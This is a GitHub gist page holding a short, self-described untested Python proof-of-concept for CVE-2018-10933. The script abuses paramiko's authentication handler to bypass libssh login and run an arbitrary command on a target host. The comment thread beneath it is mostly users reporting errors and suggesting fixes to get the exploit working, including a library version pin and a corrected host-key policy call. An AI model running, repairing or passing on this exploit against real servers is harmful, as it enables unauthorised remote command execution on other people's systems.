Skip to content

Instantly share code, notes, and snippets.

@mlosapio

mlosapio/CVE-2018-10933-test

Last active Apr 2, 2021
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Raw
CVE-2018-10933-test
#!/usr/bin/env python
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# untested CVE-2018-10933
import sys, paramiko
import logging
username = sys.argv[1]
hostname = sys.argv[2]
command = sys.argv[3]
new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[
paramiko.common.MSG_USERAUTH_SUCCESS]
def auth_accept(*args, **kwargs):
return new_auth_accept(*args, **kwargs)
paramiko.auth_handler.AuthHandler._handler_table.update({
paramiko.common.MSG_USERAUTH_REQUEST: auth_accept,
})
port = 22
try:
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.WarningPolicy)
client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key")
stdin, stdout, stderr = client.exec_command(command)
print stdout.read(),
finally:
client.close()
@Fnaste
Copy link

Fnaste commented Oct 17, 2018

not working,

INFO:paramiko.transport:Authentication (publickey) failed.
DEBUG:paramiko.transport:userauth is OK
INFO:paramiko.transport:Authentication (password) failed.
DEBUG:paramiko.transport:EOF in transport thread
Traceback (most recent call last):

paramiko.AuthenticationException: Authentication failed.

@scanfsec
Copy link

scanfsec commented Oct 17, 2018

IOError: [Errno 2] No such file or directory: 'fake.key'

@tarrinho
Copy link

tarrinho commented Oct 17, 2018

rute@Kali2018:~/mlosapio-libssh# python ./CVE-2018-10933-test.py rute localhost pwd
Traceback (most recent call last):
File "./CVE-2018-10933-test.py", line 13, in
paramiko.common.MSG_USERAUTH_SUCCESS]
TypeError: 'property' object has no attribute 'getitem'

@CyberMonitor
Copy link

CyberMonitor commented Oct 17, 2018

rute@Kali2018:~/mlosapio-libssh# python ./CVE-2018-10933-test.py rute localhost pwd
Traceback (most recent call last):
File "./CVE-2018-10933-test.py", line 13, in
paramiko.common.MSG_USERAUTH_SUCCESS]
TypeError: 'property' object has no attribute 'getitem'

pip install paramiko==2.0.8

will work fine!!!

@soekarmana
Copy link

soekarmana commented Oct 17, 2018

got an error
typeError: unbound method missing_host_key() must be called with WarningPolicy instance as first argument (got SSHClient instance instead)

client.set_missing_host_key_policy(paramiko.WarningPolicy)
should be
client.set_missing_host_key_policy(paramiko.WarningPolicy())

@johndpope
Copy link

johndpope commented Oct 17, 2018

type
find parent working directory

pwd 
/Users/username/Documents

IOError: [Errno 2] No such file or directory: 'fake.key'
ssh-keygen -t rsa -b 4096 -C "your_email@example.com"
when it asks for filename
Enter file in which to save the key (/Users/username/.ssh/id_rsa):
enter pwd
/Users/username/Documents/fake.key

@johndpope
Copy link

johndpope commented Oct 17, 2018

for testing on localhost - https://github.com/SoledaD208/CVE-2018-10933

@th0j
Copy link

th0j commented Oct 17, 2018
edited

I don't know why i throw exception: "paramiko.ssh_exception.AuthenticationException: Authentication failed."

@nullenc0de
Copy link

nullenc0de commented Oct 17, 2018

My SSH box looks like this:

SSH version : SSH-2.0-libssh_0.7.0
SSH supported authentication : publickey

I ran the following command:
python ./CVE-2018-10933-test.py root localhost pwd

Below is the output:
DEBUG:paramiko.transport:starting thread (client mode): 0x46d3d990L
DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-paramiko_2.0.8
DEBUG:paramiko.transport:Remote version/idstring: SSH-2.0-libssh_0.7.0
INFO:paramiko.transport:Connected (version 2.0, client libssh_0.7.0)
DEBUG:paramiko.transport:kex algos:[u'curve25519-sha256@libssh.org', u'ecdh-sha2-nistp256', u'ecdh-sha2-nistp384', u'ecdh-sha2-nistp521', u'diffie-hellman-group-exchange-sha256'] server key:[u'ecdsa-sha2-nistp256', u'ssh-dss', u'ssh-rsa'] client encrypt:[u'chacha20-poly1305@openssh.com', u'aes256-ctr', u'aes192-ctr', u'aes128-ctr'] server encrypt:[u'chacha20-poly1305@openssh.com', u'aes256-ctr', u'aes192-ctr', u'aes128-ctr'] client mac:[u'hmac-sha2-256', u'hmac-sha2-512', u'hmac-sha1'] server mac:[u'hmac-sha2-256', u'hmac-sha2-512', u'hmac-sha1'] client compress:[u'none', u'zlib', u'zlib@openssh.com'] server compress:[u'none', u'zlib', u'zlib@openssh.com'] client lang:[u''] server lang:[u''] kex follows?False
DEBUG:paramiko.transport:Kex agreed: diffie-hellman-group-exchange-sha256
DEBUG:paramiko.transport:Cipher agreed: aes128-ctr
DEBUG:paramiko.transport:MAC agreed: hmac-sha2-256
DEBUG:paramiko.transport:Compression agreed: none
DEBUG:paramiko.transport:Got server p (2048 bits)
/usr/local/lib/python2.7/dist-packages/paramiko/ecdsakey.py:202: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
signature, ec.ECDSA(self.ecdsa_curve.hash_object())
DEBUG:paramiko.transport:kex engine KexGexSHA256 specified hash_algo
DEBUG:paramiko.transport:Switch to new keys ...
DEBUG:paramiko.transport:EOF in transport thread
Traceback (most recent call last):
File "cve.py", line 27, in
client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key")
File "/usr/local/lib/python2.7/dist-packages/paramiko/client.py", line 366, in connect
server_key)
TypeError: unbound method missing_host_key() must be called with WarningPolicy instance as first argument (got SSHClient instance instead)

@e3prom
Copy link

e3prom commented Oct 17, 2018

As another user pointed out, you must change:

client.set_missing_host_key_policy(paramiko.WarningPolicy)

for

client.set_missing_host_key_policy(paramiko.WarningPolicy())

I've tested the script on a known vulnerable server and it does return a paramiko.ssh_exception.AuthenticationException: Authentication failed. error. Definitively a false negative here.

I would love to see a working exploit targeting a production-use server implementation. According to my experiments, the exploitation is heavily dependent on the server's logic, but I can be wrong.

@tuyenhva
Copy link

tuyenhva commented Oct 17, 2018

exec_command not work:

DEBUG:paramiko.transport:Authentication type (publickey) not permitted.
DEBUG:paramiko.transport:Allowed methods: [u'password']
DEBUG:paramiko.transport:userauth is OK
INFO:paramiko.transport:Authentication (password) successful!
DEBUG:paramiko.transport:[chan 0] Max packet in: 32768 bytes
DEBUG:paramiko.transport:[chan 0] Max packet out: 35000 bytes
DEBUG:paramiko.transport:Secsh channel 0 opened.
DEBUG:paramiko.transport:[chan 0] EOF sent (0)
DEBUG:paramiko.transport:EOF in transport thread
Traceback (most recent call last):
File "test.py", line 28, in
stdin, stdout, stderr = client.exec_command(command)
File "C:\Python27\lib\site-packages\paramiko\client.py", line 429, in exec_command
chan.exec_command(command)
File "C:\Python27\lib\site-packages\paramiko\channel.py", line 62, in _check
return func(self, *args, **kwds)
File "C:\Python27\lib\site-packages\paramiko\channel.py", line 240, in exec_command
self._wait_for_event()
File "C:\Python27\lib\site-packages\paramiko\channel.py", line 1143, in _wait_for_event
raise e
paramiko.ssh_exception.SSHException: Channel closed.

@th0j
Copy link

th0j commented Oct 18, 2018

As another user pointed out, you must change:

client.set_missing_host_key_policy(paramiko.WarningPolicy)

for

client.set_missing_host_key_policy(paramiko.WarningPolicy())

I've tested the script on a known vulnerable server and it does return a paramiko.ssh_exception.AuthenticationException: Authentication failed. error. Definitively a false negative here.

I would love to see a working exploit targeting a production-use server implementation. According to my experiments, the exploitation is heavily dependent on the server's logic, but I can be wrong.

I check my server and I found the libssh version 0.6.3-4.3. And I ran your code but it's always raise paramiko.ssh_exception.AuthenticationException: Authentication failed.
image

@soekarmana
Copy link

soekarmana commented Oct 18, 2018

from : https://security.stackexchange.com/questions/195834/cve-2018-10933-bypass-ssh-authentication-libssh-vulnerability
apparently OpenSSH does not rely on libssh

OpenSSH (which is the standard SSH daemon on most systems) does not rely on libssh.

anyone can confirm this?

@ocean390
Copy link

ocean390 commented Oct 18, 2018

from : https://security.stackexchange.com/questions/195834/cve-2018-10933-bypass-ssh-authentication-libssh-vulnerability
apparently OpenSSH does not rely on libssh

OpenSSH (which is the standard SSH daemon on most systems) does not rely on libssh.

anyone can confirm this?

Yes, libssh is an implementation of ssh protocol server library, and OpenSSH is an another implementation

@qran253
Copy link

qran253 commented Oct 19, 2018

what is wrong here ? installed python-paramiko

root@test-VM:/home/test# python3 asd.py
Traceback (most recent call last):
File "asd.py", line 4, in
import paramiko
ModuleNotFoundError: No module named 'paramiko'

@rodrigobash
Copy link

rodrigobash commented Oct 19, 2018

What am I doing wrong?

image

@salik89
Copy link

salik89 commented Oct 2, 2020

Hi there, I chanced upon this and wondering if you could advise if there is a need for me to have an actual server before I can test this code? Or could I test it locally, eg. In Kali via VirtualBox?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment